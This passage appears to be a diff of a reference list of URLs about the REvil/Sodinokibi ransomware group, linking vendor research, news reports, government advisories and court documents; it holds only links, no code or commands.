- "https://medium.com/s2wlab/deep-analysis-of-revil-ransomware-written-in-korean-d1899c0e9317",
- "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
- "https://twitter.com/Jacob_Pimental/status/1391055792774729728",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
- "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://krebsonsecurity.com/2019/07/is-revil-the-new-gandcrab-ransomware/",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
- "https://www.bleepingcomputer.com/news/security/revil-ransomwares-servers-mysteriously-come-back-online/",
- "https://www.ironnet.com/blog/ransomware-graphic-blog",
- "https://unit42.paloaltonetworks.com/threat-brief-kaseya-vsa-ransomware-attacks/",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil",
- "https://www.crowdstrike.com/blog/how-crowdstrike-stops-revil-ransomware-from-kaseya-attack/",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling",
- "https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel",
- "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/",
- "https://www.bleepingcomputer.com/news/security/revil-ransomware-devs-added-a-backdoor-to-cheat-affiliates/",
- "https://www.youtube.com/watch?v=l2P5CMH9TE0",
- "https://www.flashpoint-intel.com/blog/possible-universal-revil-master-key-posted-to-xss/",
- "https://www.darktrace.com/en/blog/staying-ahead-of-r-evils-ransomware-as-a-service-business-model/",
- "https://www.zdnet.com/article/revil-ransomware-gang-launches-auction-site-to-sell-stolen-data/",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
- "https://medium.com/@underthebreach/tracking-down-revils-lalartu-by-utilizing-multiple-osint-methods-2bf3a6c65a80",
- "https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/",
- "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
- "https://www.bleepingcomputer.com/news/security/new-jersey-synagogue-suffers-sodinokibi-ransomware-attack/",
- "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/",
- "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
- "https://www.bleepingcomputer.com/news/security/fbi-revil-cybergang-behind-the-jbs-ransomware-attack/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
- "https://www.cybereason.com/blog/cybereason-vs-revil-ransomware-the-kaseya-chronicles",
- "https://home.treasury.gov/news/press-releases/jy0471",
- "https://teamt5.org/en/posts/introducing-the-most-profitable-ransomware-revil/",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/",
- "https://www.bleepingcomputer.com/news/security/kaseyas-universal-revil-decryption-key-leaked-on-a-hacking-forum/",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://dissectingmalwa.re/germanwipers-big-brother-gandgrabs-kid-sodinokibi.html",
- "https://f.hubspotusercontent10.net/hubfs/7095517/FLINT-Kaseya-Another%20Massive%20Heist%20by%20REvil.pdf",
- "https://sites.temple.edu/care/ci-rw-attacks/",
- "https://www.br.de/nachrichten/deutschland-welt/mutmasslicher-ransomware-millionaer-identifiziert,Sn3iHgJ",
- "https://twitter.com/VK_Intel/status/1411066870350942213",
- "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf",
- "https://ke-la.com/darknet-threat-actors-are-not-playing-games-with-the-gaming-industry/",
- "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://thehackernews.com/2022/03/ukrainian-hacker-linked-to-revil.html",
- "https://drive.google.com/file/d/1ph1E0onZ7TiNyG87k4WjofCKNuCafMLk/view",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://cocomelonc.github.io/malware/2023/02/02/malware-analysis-7.html",
- "https://www.acronis.com/en-sg/articles/sodinokibi-ransomware/",
- "https://www.advanced-intel.com/post/revil-vanishes-from-underground-infrastructure-down-support-staff-adverts-silent",
- "https://www.appgate.com/blog/electric-company-ransomware-attack-calls-for-14-million-in-ransom",
- "https://www.goggleheadedhacker.com/blog/post/sodinokibi-ransomware-analysis",
- "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
- "https://www.cyjax.com/2021/07/09/revilevolution/",
- "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
- "https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html",
- "https://www.bleepingcomputer.com/news/security/another-ransomware-will-now-publish-victims-data-if-not-paid/",
- "https://www.reuters.com/technology/exclusive-governments-turn-tables-ransomware-gang-revil-by-pushing-it-offline-2021-10-21/",
- "https://www.trendmicro.com/en_us/research/21/a/sodinokibi-ransomware.html",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
- "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-gang-rises-from-the-ashes-of-darkside-revil/",
- "https://www.flashpoint-intel.com/blog/revil-disappears-again/",
- "https://therecord.media/i-scrounged-through-the-trash-heaps-now-im-a-millionaire-an-interview-with-revils-unknown/",
- 
"https://threatpost.com/ransomware-revil-sites-disappears/167745/", - "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", - "https://securelist.com/ransomware-world-in-2021/102169/", - "https://twitter.com/SyscallE/status/1411074271875670022", - "https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa", - "https://areteir.com/wp-content/uploads/2020/07/Arete_Insight_Sodino-Ransomware_June-2020.pdf", - "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", - "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", - "https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/", - "https://kaseya.app.box.com/s/0ysvgss7w48nxh8k1xt7fqhbcjxhas40", - "https://tehtris.com/fr/peut-on-neutraliser-un-ransomware-lance-en-tant-que-system-sur-des-milliers-de-machines-en-meme-temps/", - "https://twitter.com/fwosar/status/1411281334870368260", - "https://www.flashpoint-intel.com/blog/interview-with-revil-affiliated-ransomware-contractor/", - "https://www.bleepingcomputer.com/news/security/revil-ransomware-returns-new-malware-sample-confirms-gang-is-back/", - "https://www.kpn.com/security-blogs/Tracking-REvil.htm", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/undressing-the-revil/", - "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/", - "https://www.tgsoft.it/english/news_archivio_eng.asp?id=1004", - "https://krebsonsecurity.com/2021/11/revil-ransom-arrest-6m-seizure-and-10m-reward/", - 
"https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses", - "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/", - "https://www.databreaches.net/a-former-darkside-listing-shows-up-on-revils-leak-site/", - "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", - "https://www.flashpoint-intel.com/blog/cl0p-and-revil-escalate-their-ransomware-tactics/", - "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", - "https://www.youtube.com/watch?v=P8o6GItci5w", - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/", - "https://www.goggleheadedhacker.com/blog/post/reversing-crypto-functions", - "https://blog.morphisec.com/real-time-prevention-of-the-kaseya-vsa-supply-chain-revil-ransomware-attack", - "https://www.europol.europa.eu/newsroom/news/five-affiliates-to-sodinokibi/revil-unplugged", - "https://www.secureworks.com/research/lv-ransomware", - "https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html", - "https://www.pandasecurity.com/emailhtml/2007-CAM-RANSOMWARE-AD360-WG/2006-Report-Sodinokibi-EN.pdf", - "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/", - "https://twitter.com/fwosar/status/1420119812815138824", - "https://hatching.io/blog/ransomware-part2", - "https://news.sophos.com/en-us/2021/06/11/relentless-revil-revealed/", - "https://vimeo.com/449849549", - "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities", - 
"https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", - "https://www.domaintools.com/resources/blog/revealing-revil-ransomware-with-domaintools-and-maltego", - "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", - "https://blogs.blackberry.com/en/2021/11/revil-under-the-microscope", - "https://storage.courtlistener.com/recap/gov.uscourts.txnd.352371/gov.uscourts.txnd.352371.1.0_1.pdf", - "https://redcanary.com/blog/uncompromised-kaseya/", - "https://twitter.com/R3MRUM/status/1412064882623713283", - "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom", - "https://blog.group-ib.com/REvil_RaaS", - "https://twitter.com/LloydLabs/status/1411098844209819648", - "https://twitter.com/SophosLabs/status/1412056467201462276", - "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/", - "https://www.huntress.com/blog/security-researchers-hunt-to-discover-origins-of-the-kaseya-vsa-mass-ransomware-incident", - "https://velzart.nl/blog/ransomeware/", - "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-to-stop-taking-bitcoin-to-hide-money-trail/", - "https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/", - "https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2022-05-01-revil-reborn-ransom.vk.cfg.txt", - "https://intel471.com/blog/changes-in-revil-ransomware-version-2-2", - "https://www.trendmicro.com/en_us/research/21/h/supply-chain-attacks-from-a-managed-detection-and-response-persp.html", - "https://community.riskiq.com/article/3315064b", - "https://twitter.com/SophosLabs/status/1413616952313004040?s=20", - "https://threatintel.blog/OPBlueRaven-Part1/", + "https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/", 
"https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-says-travelex-will-pay-one-way-or-another/", - "https://www.elastic.co/blog/ransomware-interrupted-sodinokibi-and-the-supply-chain", + "https://f.hubspotusercontent10.net/hubfs/5943619/Whitepaper-Downloads/Ransomware_in_ICS_Environments_Whitepaper_10_12_20.pdf", + "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/", + "https://www.acronis.com/en-sg/articles/sodinokibi-ransomware/", + "https://www.justice.gov/opa/pr/sodinokibirevil-ransomware-defendant-extradited-united-states-and-arraigned-texas", + "https://tehtris.com/fr/peut-on-neutraliser-un-ransomware-lance-en-tant-que-system-sur-des-milliers-de-machines-en-meme-temps/", + "https://www.cnbc.com/2021/04/23/axis-of-revil-inside-the-hacker-collective-taunting-apple.html", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.splunk.com/en_us/blog/security/revil-ransomware-threat-research-update-and-detections.html", + "https://krebsonsecurity.com/2019/07/is-revil-the-new-gandcrab-ransomware/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks", + "https://www.advanced-intel.com/post/revil-vanishes-from-underground-infrastructure-down-support-staff-adverts-silent", + "https://www.secureworks.com/blog/revil-development-adds-confidence-about-gold-southfield-reemergence?linkId=164334801", + "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-to-stop-taking-bitcoin-to-hide-money-trail/", + "https://blag.nullteilerfrei.de/2019/11/09/api-hashing-why-and-how/", + "https://blog.morphisec.com/real-time-prevention-of-the-kaseya-vsa-supply-chain-revil-ransomware-attack", + "https://www.secureworks.com/blog/revil-ransomware-reemerges-after-shutdown-universal-decryptor-released", + 
"https://www.advintel.io/post/storm-in-safe-haven-takeaways-from-russian-authorities-takedown-of-revil", + "https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html", + "https://www.bbc.com/news/technology-59297187", + "https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/", + "https://www.boll.ch/datasheets/WG_Threat_Report_EN.pdf", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://cybleinc.com/2021/07/03/uncensored-interview-with-revil-sodinokibi-ransomware-operators/", + "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/", + "https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html", + "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", + "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/", + "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", + "https://news.sophos.com/en-us/2021/06/30/mtr-in-real-time-hand-to-hand-combat-with-revil-ransomware-chasing-a-2-5-million-pay-day/", + "https://blogs.blackberry.com/en/2021/11/revil-under-the-microscope", "https://twitter.com/resecurity_com/status/1412662343796813827", "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", - "https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/", - "https://www.fincen.gov/sites/default/files/advisory/2021-11-08/FinCEN%20Ransomware%20Advisory_FINAL_508_.pdf", - 
"https://ke-la.com/ransomware-gangs-are-starting-to-look-like-oceans-11/", - "https://www.bleepingcomputer.com/news/security/revil-gang-tries-to-extort-apple-threatens-to-sell-stolen-blueprints/", - "https://www.bleepingcomputer.com/news/security/revil-ransomware-shuts-down-again-after-tor-sites-were-hijacked/", - "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", - "https://www.youtube.com/watch?v=QYQQUUpU04s", - "https://searchsecurity.techtarget.com/feature/Ransomware-negotiations-An-inside-look-at-the-process", - "https://www.certego.net/en/news/malware-tales-sodinokibi/", - "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", - "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", - "https://twitter.com/AdamTheAnalyst/status/1409499591452639242?s=20", - "https://www.darkowl.com/blog-content/page-not-found-revil-darknet-services-offline-after-attack-last-weekend", - "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b", - "https://therecord.media/us-arrests-and-charges-ukrainian-man-for-kaseya-ransomware-attack/", - "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", - "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", - "https://diicot.ro/mass-media/3341-comunicat-de-presa-2-08-11-2021", - "https://news.sophos.com/en-us/2021/06/30/what-to-expect-when-youve-been-hit-with-revil-ransomware/", - "https://teamt5.org/tw/posts/revil-dll-sideloading-technique-used-by-other-hackers/", - "https://ke-la.com/easy-way-in-5-ransomware-victims-had-their-pulse-secure-vpn-credentials-leaked/", - "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", - "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/", - 
"https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf", - "https://gist.githubusercontent.com/fwosar/a63e1249bfccb8395b961d3d780c0354/raw/312b2bbc566cbee2dac7b143dc143c1913ddb729/revil.json", - "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html", - "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/", - "https://www.secureworks.com/research/revil-sodinokibi-ransomware", - "https://news.sophos.com/en-us/2021/06/30/mtr-in-real-time-hand-to-hand-combat-with-revil-ransomware-chasing-a-2-5-million-pay-day/", - "https://www.elliptic.co/blog/revil-revealed-tracking-ransomware-negotiation-and-payment", - "https://russian.rt.com/russia/article/926347-barnaulec-rozysk-fbr-kibermoshennichestvo", - "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-threatens-to-publish-data-of-automotive-group/", - "https://www.boll.ch/datasheets/WG_Threat_Report_EN.pdf", - "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", - "https://www.justice.gov/opa/pr/ukrainian-arrested-and-charged-ransomware-attack-kaseya", - "https://www.bleepingcomputer.com/news/security/kaseya-obtains-universal-decryptor-for-revil-ransomware-victims/", - "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide", - "https://blag.nullteilerfrei.de/2020/02/02/defeating-sodinokibi-revil-string-obfuscation-in-ghidra/", - "https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/", - "https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-1-000-plus-companies-in-msp-supply-chain-attack/", - "https://public.intel471.com/blog/revil-ransomware-interview-russian-osint-100-million/", + 
"https://www.europol.europa.eu/newsroom/news/five-affiliates-to-sodinokibi/revil-unplugged", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", "https://www.flashpoint-intel.com/blog/chatter-indicates-blackmatter-as-revil-successor/", - "https://storage.courtlistener.com/recap/gov.uscourts.txnd.351760/gov.uscourts.txnd.351760.1.0_3.pdf", - "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/", + "https://www.pandasecurity.com/emailhtml/2007-CAM-RANSOMWARE-AD360-WG/2006-Report-Sodinokibi-EN.pdf", + "https://www.flashpoint-intel.com/blog/interview-with-revil-affiliated-ransomware-contractor/", "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", - "https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights", - "https://www.youtube.com/watch?v=tZVFMVm5GAk", + "https://diicot.ro/mass-media/3341-comunicat-de-presa-2-08-11-2021", + "https://storage.courtlistener.com/recap/gov.uscourts.txnd.352371/gov.uscourts.txnd.352371.1.0_1.pdf", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/undressing-the-revil/", + "https://sites.temple.edu/care/ci-rw-attacks/", + "https://www.fincen.gov/sites/default/files/advisory/2021-11-08/FinCEN%20Ransomware%20Advisory_FINAL_508_.pdf", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://storage.courtlistener.com/recap/gov.uscourts.txnd.351760/gov.uscourts.txnd.351760.1.0_3.pdf", + "https://blog.group-ib.com/REvil_RaaS", + "https://www.cybereason.com/blog/cybereason-vs-revil-ransomware-the-kaseya-chronicles", + "https://drive.google.com/file/d/1ph1E0onZ7TiNyG87k4WjofCKNuCafMLk/view", + "https://twitter.com/VK_Intel/status/1411066870350942213", + "https://www.elastic.co/blog/ransomware-interrupted-sodinokibi-and-the-supply-chain", + 
"https://www.kpn.com/security-blogs/Tracking-REvil.htm", "https://www.zscaler.com/blogs/security-research/kaseya-supply-chain-ransomware-attack-technical-analysis-revil-payload", - "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", - "https://www.flashpoint-intel.com/blog/revils-cryptobackdoor-con-ransomware-groups-tactics-roil-affiliates-sparking-a-fallout/", + "https://www.huntress.com/blog/security-researchers-hunt-to-discover-origins-of-the-kaseya-vsa-mass-ransomware-incident", + "https://www.secureworks.com/blog/revil-the-gandcrab-connection", + "https://twitter.com/svch0st/status/1411537562380816384", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", + "https://twitter.com/SophosLabs/status/1413616952313004040?s=20", + "https://teamt5.org/en/posts/introducing-the-most-profitable-ransomware-revil/", + "https://www.darkowl.com/blog-content/page-not-found-revil-darknet-services-offline-after-attack-last-weekend", + "https://ke-la.com/ransomware-gangs-are-starting-to-look-like-oceans-11/", + "https://www.bleepingcomputer.com/news/security/another-ransomware-will-now-publish-victims-data-if-not-paid/", + "https://cocomelonc.github.io/malware/2023/02/02/malware-analysis-7.html", + "https://twitter.com/_alex_il_/status/1412403420217159694", + "https://www.elliptic.co/blog/revil-revealed-tracking-ransomware-negotiation-and-payment", + "https://therecord.media/i-scrounged-through-the-trash-heaps-now-im-a-millionaire-an-interview-with-revils-unknown/", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://www.connectwise.com/resources/revil-profile", + "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/", + 
"https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://www.justice.gov/opa/pr/ukrainian-arrested-and-charged-ransomware-attack-kaseya", + "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/", + "https://www.secureworks.com/research/threat-profiles/gold-southfield", + "https://threatpost.com/ransomware-revil-sites-disappears/167745/", + "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html", + "https://blog.amossys.fr/sodinokibi-malware-analysis.html", + "https://www.nytimes.com/2019/08/22/us/ransomware-attacks-hacking.html", + "https://ke-la.com/darknet-threat-actors-are-not-playing-games-with-the-gaming-industry/", + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil", + "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/", + "https://www.digitalshadows.com/blog-and-research/revil-analysis-of-competing-hypotheses/", + "https://www.bleepingcomputer.com/news/security/revil-ransomware-gang-claims-over-100-million-profit-in-a-year/", + "https://teamt5.org/tw/posts/revil-dll-sideloading-technique-used-by-other-hackers/", + "https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", + "http://www.fsb.ru/fsb/press/message/single.htm%21id%3D10439388%40fsbMessage.html", + "https://medium.com/@underthebreach/tracking-down-revils-lalartu-by-utilizing-multiple-osint-methods-2bf3a6c65a80", + 
"https://public.intel471.com/blog/revil-ransomware-interview-russian-osint-100-million/", + "https://twitter.com/SophosLabs/status/1412056467201462276", + "https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses", + "https://community.riskiq.com/article/3315064b", + "https://twitter.com/fwosar/status/1411281334870368260", + "https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/", + "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf", + "https://www.netskope.com/blog/netskope-threat-coverage-revil", + "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", + "https://securelist.com/ransomware-world-in-2021/102169/", + "https://twitter.com/LloydLabs/status/1411098844209819648", + "https://searchsecurity.techtarget.com/feature/Ransomware-negotiations-An-inside-look-at-the-process", + "https://unit42.paloaltonetworks.com/threat-brief-kaseya-vsa-ransomware-attacks/", + "https://dissectingmalwa.re/germanwipers-big-brother-gandgrabs-kid-sodinokibi.html", + "https://www.flashpoint-intel.com/blog/possible-universal-revil-master-key-posted-to-xss/", + "https://blog.truesec.com/2021/07/06/kaseya-vsa-zero-day-exploit", + "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", + "https://kaseya.app.box.com/s/0ysvgss7w48nxh8k1xt7fqhbcjxhas40", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://intel471.com/blog/changes-in-revil-ransomware-version-2-2", + "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b", + "https://asec.ahnlab.com/ko/19860/", + "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-new-york-airport-systems/", + 
"https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/", + "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/", + "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", + "https://www.grahamcluley.com/travelex-paid-ransom/", + "https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/", + "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", + "https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/", + "https://blog.gigamon.com/2021/07/08/observations-and-recommendations-from-the-ongoing-revil-kaseya-incident/", "https://www.bleepingcomputer.com/news/security/revil-ransomware-gangs-web-sites-mysteriously-shut-down/", + "https://www.documentcloud.org/documents/21505031-hgsac-staff-report-americas-data-held-hostage-032422", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://areteir.com/wp-content/uploads/2020/07/Arete_Insight_Sodino-Ransomware_June-2020.pdf", + "https://f.hubspotusercontent10.net/hubfs/7095517/FLINT-Kaseya-Another%20Massive%20Heist%20by%20REvil.pdf", + "https://securityintelligence.com/posts/sodinokibi-revil-ransomware-disrupt-trade-secrets/", + "https://news.sophos.com/en-us/2021/06/30/what-to-expect-when-youve-been-hit-with-revil-ransomware/", + "https://unit42.paloaltonetworks.com/prometheus-ransomware/", + "https://www.bleepingcomputer.com/news/security/fbi-revil-cybergang-behind-the-jbs-ransomware-attack/", + "https://securityaffairs.co/wordpress/98694/malware/sodinokibi-kenneth-cole-data-breach.html", + 
